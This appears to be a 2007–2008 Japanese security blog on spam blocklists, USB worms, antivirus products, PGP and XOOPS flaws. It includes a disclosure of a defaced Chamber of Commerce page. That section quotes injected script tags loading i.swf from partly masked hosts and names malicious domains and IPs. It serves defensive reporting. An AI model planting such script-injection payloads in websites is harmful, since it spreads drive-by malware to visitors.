security-literacy

The Spamhaus Block List (SBL) / スパムギャング (ROKSO) を含む
　http://www.spamhaus.org/sbl/latest.lasso
スパム送信IPとして登録された最新ブラックリストを見ると、今回
CIDR（サイダー）表記
　"http://ja.wikipedia.org/wiki/IPアドレス"
/32 から /22 まで含まれる。対象範囲として前者で１個、後者で1,024個のIPアドレスがブラックリストに指定されたことになる。

迷惑メールを「12の防御層」でブロックする　Barracuda Spam Firewall
　http://www.barracudanetworks.com/
は、「[引用] バラクーダレピュテーション解析により・・中略・・送信者のIPアドレスをバラクーダブラックリスト（拒否リスト）、またはバラクーダホワイトリスト（許可リスト）で検索をかけ、Eメールの防御・許可を決定します。他の"（あいまいな）グレイエリア"にあるIPアドレスを持つEメールは、そのまま次の9段階のスパム／ウィルスの防御層で解析されていきます。」
　http://www.barracudacentral.org/lookups
バラクーダ セントラルで送信メールサーバの評価状況がわかります。
図（下段　背景色 ピンク）
　The ip address 2**.***.***.**8 is listed as "poor" on the Barracuda Reputation System. ・・・
では、メール内容の解析前にブロックされます。解除申請後、

図（上段 背景色 グリーン）
　The ip address 2**.***.***.**9 is not currently listed as "poor" on the Barracuda Reputation System.

承認されると、非スパムメールはフィルターを通過します。
ホスティング・サーバーを使用中、共有ユーザーなどのスパム行為により、再び"poor"となるかもしれません。　Barracuda Spam Firewallに送信拒否されないため、送信メールサーバの定期的なチェックをおすすめします。
[投稿/過去・現在]
　http://sb.xrea.com/showthread.php?p=88112#post88112
　http://blog.m3.com/blogosphere/20080717/__-_Barracuda_Reputation_System

ウイルス対策ソフト内蔵USBメモリ
(1) トレンドマイクロ「Trend Micro USB Security™ for Biz」
　Windows Vista, XP, 2000 Pro / Advanced Server SP4
　http://jp.trendmicro.com/jp/products/enterprise/tmusb/

下記２社（※）から販売
※ BUFFALO 株式会社バッファロー
「RUF2-HSCUWシリーズ」
　Windows Vista（32bit/64bit）, XP（SP2以降、32bit）, 2000（SP4以降）
　http://buffalo.jp/products/catalog/flash/ruf2-hscuw/

※ IODATA アイ・オー・データ機器
「EasyDisk V - xxxMB/xGB」
　Windows Vista（32/64bit）, XP SP2以降（32bit）, 2000 SP4
　http://www.iodata.jp/product/usbmemory/easydisk/ed-v/index.htm

(2) Virus Chaser「Cshieldstick V」
　Windows 98(SE), Me, 2000 Pro（SP3またはSP4), XP （Vista未対応）
　http://www.viruschaser.jp/products/product_cstickv.html

下記会社（※）も販売
※ 株式会社インテリジェント ウェイブ　2005-03-04

USBワーム（W32/Autorun、MAL_OTORUNなど）
「USBメモリを差し込んだだけで感染する」というのは、Windows Vistaをデフォルト環境で使用し、自動再生時のダイアログにおいて「常に次の動作を行う」にチェックした場合です。USBメモリを挿すだけで感染する可能性があります。Windows XP（もちろん、Vistaも）では、マイコンピュータ内のドライブアイコンをダブルクリックすると感染しますが、Windows XP はUSBメモリ挿入だけでは感染しません。
基本操作として「Shift キーを押しながら、USB メモリー」を挿入し、(1) ウイルススキャンを実施し、感染がないことを確認するか、(2) マイコンピュータ内のドライブアイコンをダブルクリックしないで、エクスプローラでUSBメモリのフォルダ内にアクセスするか、です。
参考ページ
　http://blog.trendmicro.co.jp/archives/2334
　http://jp.trendmicro.com/jp/threat/solutions/usb/

オンラインで Web サイトの検査を行い、安全性について全体的な評価を行うサービスがあります。

McAfee SiteAdvisor
　http://www.siteadvisor.com/
Norton Safe Web
　http://safeweb.norton.com/

【感 想】
McAfee社：検査済みのことが多い。Symantec社：悪質なサイトの照合しやすい。

【その他】
トレンドマイクロ社：Trend プロテクト™「ウイルスバスター2008をすでにお使いで、オンラインユーザ登録がお済みのお客さまのみにご利用いただけるツールです。」
　http://www.trendflexsecurity.jp/security_solutions/trendprotect.php

日本商工会議所オンラインマーク総合センター
　http://mark.cin.or.jp/
のオンラインマークが改ざんされており、
ページに不正なスクリプトが埋め込まれています。
マーク使用許可事業者の「オンラインマークの認証関係情報」
　商工会議所オンラインマーク地域センターへのリンク中および地域センターの所在地の右端に挿入されています。
ユーザーのシステムに脆弱性があると、このコードによって実行可能ファイルが実行され、マルウェアがダウンロードされるかもしれません。オンラインマークは絶対にクリックしないで下さい。
2008-10-05 7 p.m.

ホームページの不正アクセスと改竄について下記へ連絡しました。

日本商工会議所オンラインマーク総合センター
　　メール連絡済　（第一報　Sun, 05 Oct 2008 12:05:51 +0900）
　　電話連絡済

情報処理推進機構（IPA）セキュリティセンター（ISEC）
　http://www.ipa.go.jp/security/ciadr/index.html
　　留守電メッセージ済
　　メール連絡済 (受理 2008-10-06 ca 3 p.m.）

都道府県警察本部のサイバー犯罪相談窓口
　http://www.npa.go.jp/cyber/soudan.htm
　　警視庁　　長時間電話中で連絡不可
　　地元警察本部　電話で情報提供済

JPCERTコーディネーションセンター（JPCERT/CC）
　http://www.jpcert.or.jp/
　　メール連絡済（受理 2008-10-06 11 a.m.）

[調査結果]
日本商工会議所オンラインマーク総合センター
オンラインマークの改ざんにより不正に挿入されているドメイン名
2008-10-07時点で、赤矢印の位置の"水平線"は表示されなくなりましたが、不正スクリプトは存在します。

drmyy.cn　（2008-10-05 4 p.m. 時点の対応グロ－バルIP 211.154.163.43）
　http://safeweb.norton.com/report/show?url=drmyy.cn&x=0&y=0
　http://www.siteadvisor.com/sites/drmyy.cn/summary/

日本商工会議所オンラインマーク総合センターのサイト要素
に含まれていると思われるIPアドレス
　　ブラウザ Google Chrome (現時点での最新バージョン 0.2.149.30) BETAによる警告メッセージより

125.68.57.154　（2008-10-05 4 p.m. 時点の対応ドメイン ytgw123.cn）
　http://safeweb.norton.com/report/show?url=ytgw123.cn&x=0&y=0
　http://www.siteadvisor.com/sites/ytgw123.cn

[追記 2008-10-06]
地元の商工会議所へ電話連絡済

オンラインマークの認証関係情報
　http:／／mark.cin.or.jp/database/cert-plug-inst.asp?markid=A00000-＊-＊＊
2008-10-06 10 p.m. 時点で未対応です。

[追記 2008-10-07]
不正スクリプトは削除されていません。
存在場所を示す"水平線"が表示されないように、サーバ内部で「改悪」処理が行われています。ブラウザで見た人は、不正スクリプトの要素に全く気づきません。
参照ページ：
「SQLインジェクションの仕組み――Webサイトに悪質コードを埋め込む」
　http://itpro.nikkeibp.co.jp/article/COLUMN/20080930/315826/

改ざんの前後でWebサイトの外見が変化することはほとんどない。そのため，エンドユーザーが一見して改ざんに気づくことは難しい。
例外的に，HTML出力時にデータを（投稿者注：改ざん防止対策として）エスケープ処理していたり，タイトル・タグとなるデータが改ざんされたりした場合は，〈script src=http:／／www.example.com/ngg.js〉〈／script〉といったタグが文字列としてWebサイトに表示されることがある。

不正スクリプトは削除されました。9 p.m.

【急　告】再び、サーバ乗っ取り？によるオンライン認証関連情報ページの改ざん発見
2008-11-23 午前１時
閲覧者アクセスや検索ロボットの不正サイト登録を予防するため、一部***に変更しました。

【認証機関】日本<script src=ｈｔｔｐ://61.31.***.114/i.swf></script><script src=ｈｔｔｐ://****.co.kr/i.swf></script><script src=ｈｔｔｐ://****.co.kr/i.swf></script>商工会議所オンラインマーク地域センター<br>〒100-0005　千代田区丸の内３－２－２<script src=ｈｔｔｐ://61.31.***.114/i.swf></script><script src=ｈｔｔｐ://****.co.kr/i.swf></script><script src=ｈｔｔｐ://****.co.kr/i.swf></script>

同様の手口ですが、誘導するサイトが前回と異なります。

t**-n**　（2008-11-23 9 a.m. 時点の対応グロ－バルIP 61.31.235.114）
Viruses Severity: High
　http://safeweb.norton.com/report/show?url=61.31.235.114&x=0&y=0
　http://www.siteadvisor.com/sites/61.31.235.114/summary/

ipkn.co.kr/i.swf　（2008-11-23 9 a.m. 時点の対応グロ－バルIP 211.***.62.32）
　http://safeweb.norton.com/report/show?url=ipkn.co.kri/
　http://www.siteadvisor.com/sites/ipkn.co.kri/

　　ブラウザ Google Chrome (現時点での最新バージョン 0.3.154.9) BETAによる警告メッセージより

[追記 2008-11-27] 本日 10 a.m. 当該ページの不正スクリプト削除済確認

(株)ぷららネットワークス(NTTグループ企業)が運営するISP「ぷらら」は、2008年1月31日、「迷惑メール振り分けサービス」を開始した。
　http://www.plala.or.jp/member/option_service/mailplus/antispam/
実際に、４日間でスパムメール約 700通、４ＭＢがサーバ内の迷惑メール専用フォルダ（ジャンクボックス）で一時保管状態となっている。
これまでメールソフトで振り分け、削除していた操作（自動、手動）がなくなり、パソコンを起動するときの憂鬱が一気に解消した。

しかし、自動削除までの２週間で2,000通を超える。大量のspam メールを確認することは、これまで以上に憂鬱な操作である。また、本日ジャンクボックスを閲覧しただけで、サーバエラーが発生した。サーバ負荷などを考えて、１週間程度での自動削除（オプション）をぷらら plala さんに提案した。

エンタープライズ コンプリートエディションの評価版
　PGP Desktop Enterprise 9.7 for Windows - 30-Day Trial
　PGP Desktop Trial Software (Desktop Client Only)
　　http://www.pgp.com/downloads/desktoptrial.html

2007-12-24現在の最新版は
　PGP Desktop 9.7
　9.7.0 [ビルド 1012]
　SDK 3.9.0
です。すべて日本語化されています。
ただし、日本語のマニュアル（ユーザズ ガイド）ではバージョン「PGP Desktop 9.8 for Windows」と記載されており、評価版と異なるバージョン表示です。

（30日を過ぎても）ライセンスなしで使用できる機能は「PGP Keys」と「PGP Zip ジップ」とのことです。後者は、ファイルやフォルダを暗号化 encryption し圧縮パッケージとする基本機能（暗号化方法はPGP鍵またはパスフレーズ）で、復号機能 decryption も継続使用できます。

PGP Desktop バージョン 8.x 以下のレガシー PGPフリーウェア (legacy PGP Freeware)
では対応していなかったOSでも使用できます。Windowsでは、Windows Vista、Windows XP (SP 1 または 2)、Windows 2000 (SP 4)、Windows 2003 Server (SP 1)などです。

現在使用中の PGP バージョンで必ず、鍵ペア（秘密鍵と公開鍵）、鍵リングのバックアップを作成、保存してから、PGP Desktop 9.7のインストール（アップデート）を行います。

legacy PGPの一部（PGP Desktop for Windows バージョン 8.0 以前）は手動でアンインストールしてからとなります。

Are there any license limitations?
【引用】
　http://www.pgp.com/downloads/desktoptrial2.php
After the 30-day trial, the resulting functionality is licensed on a Perpetual basis solely for personal, non-commercial purposes. Any attempt to disable these limitations or modify the software is illegal and prohibited by law.

最も安い製品のライセンス料は
　PGP Desktop Home 9.7
　　http://row.pgpstore.com/product.aspx?sku=3118544
　PGP Desktop Home 9.7 for Windows - Perpetual License $119
　PGP Desktop Home 9.7 for OS X - 同無期限ライセンス $119
のようです。

会津若松市：会津若松市ホームページへの不正侵入について
　http://www.city.aizuwakamatsu.fukushima.jp/fusei-access/index.htm
　http://www.city.aizuwakamatsu.fukushima.jp/20071128fusei_access.pdf

問題のサイトは　オープンソースソフトウェア　XOOPS（ズープス）によるポータルサイトだったのでは？　以下は投稿者（当ブログ）の推測です。

「脆弱性の対策は行われていたのか？」

2007/10/02 13:17
オープンソースのCMS「XOOPS」に脆弱性：管理者はアップデートを
　http://japan.zdnet.com/security/story/0,3800079245,20357743,00.htm
　　Release Date: 2007-10-01
　　XOOPS Uploader Class Unspecified Vulnerability
　　　　http://secunia.com/advisories/27006/

JVN#77105349：
「XOOPS」におけるクロスサイト・スクリプティングの脆弱性
　http://www.ipa.go.jp/security/vuln/documents/2005/JVN_77105349_XOOPS.html
最終更新日 2007年8月20日 独立行政法人 情報処理推進機構セキュリティセンター
など。

「多くの自治体・官公庁ポータルサイトで対策は行われているのか？」
XOOPSサイト事例---自治体・官公庁
　http://www.xoops.jp/smartsection-category.categoryid-1.htm

XOOPSコラム
タイトル
環境＊＊＊＊ナーシップオフィス（E＊＊北海道）
三重県＊市
科学技術＊＊＊構　J＊＊＊＊岡サテライト
科学技術＊＊＊構　情＊＊＊業本部
霞ヶ関＊＊＊　プロ＊＊トＫ
大分＊＊＊市
大分県＊＊＊市
徳島県 ＊＊＊公民館
佐賀県＊＊＊ネットワーク協議会
会津若松市

クリックすると、
旧コラム・XOOPSサイト事例   >  XOOPSサイト事例一覧 > XOOPSサイト事例---自治体・官公庁 > 会津若松市 
　http://www.xoops.jp/smartsection-item.itemid-8.htm

会津若松市
　http://www.city.aizuwakamatsu.fukushima.jp/edu/

など。

あるローカルネットワーク環境下では、
　http://www.osbsd.net/2007/03/broadband_route.html
⇒　OS Windows XP SP2では、ウイルスバスター2007 トレンド フレックス セキュリティ (Vista対応版、未対応版ともに）起動中ないしメモリ常駐時にブラウジング(Microsoft社 Windows Internet Explorer 7)不能となり、OS Windows 2000 Pro SP4では、同ソフトウェア使用可。

であったため、クライアントＰＣは、Norton Antivirus 2007＋Windows XP SP2、ウイルスバスター2007＋Windows 2000 Pro SP4仕様としていたが、Windows 2000 SP4ユーザーとして、ウイルスバスター2007の無料バージョンアップを試みると、以下のメッセージに遭遇します。契約更新前にその期間、OS変更などを含めてよくご検討下さい。

「Windows 2000の発売元であるマイクロソフト社が、Windows 2000のサポートメインストリームフェーズを終了したことを受け、ウイルスバスターの最新版では、Windows 2000環境への対応を終了しました。
Windows 2000をご利用の環境では最新版のウイルスバスター(投稿者注:ウイルスバスター2008 のこと)ご利用いただけませんので、ご注意ください。」

■引き続きウイルスバスターを使用するにはどうすればいいの？

「Windows 2000環境をご利用のお客さまは、「ウイルスバスター2007 トレンド フレックス セキュリティ」を パターンファイル提供の終了日（2008年末予定）までお使いいただけます。 （但し、不具合があった場合の修正は行いません。）
WindowsXPやVista などの新しいオペレーティング システムにアップグレードされることをお勧めいたします。」

2008年に「不具合があった場合の修正は行いません」とのことですから、パソコンがダウンする重大な問題などが発生したとき、他のウイルス対策サービスに変更する必要があります。
★ 参照ページ　「ウイルスバスター2007で処理が重く(遅く)なる問題と対処法‐園部研」
　http://sonobelab.com/knowhow/computer/vb2007.html

以下に大手会社のアンチウイルスソフトウェアのサービス終了期間をみると（Windows 2000 Pro SP4対応）、

◆ Norton AntiVirusなどのシマンテック製品の発売日/更新サービス終了日一覧
　http://service1.symantec.com/SUPPORT/INTER/japanesecustserv.nsf/jp_docid/20030919114134945

　Norton Internet Security 2005　⇒「未定」となっている。

◆ McAfee マカフィー - ウイルス対策と侵入防止ソリューション
　http://www.mcafee.com/Japan/mcafee/support/faq/answer_f_account.asp?wk=AC-00005
「2007年度製品はWindows2000SP4、 WinsowsXP Home/Professionalをサポートしています。Windows98/98SE、Meをご利用いただいていて、かつプログラム自動更新サービスをご利用いただいている場合は2006年度版の製品を継続してご利用いただく事ができます。」

　2007年度製品のサポート期間に一致するが、明記されていない。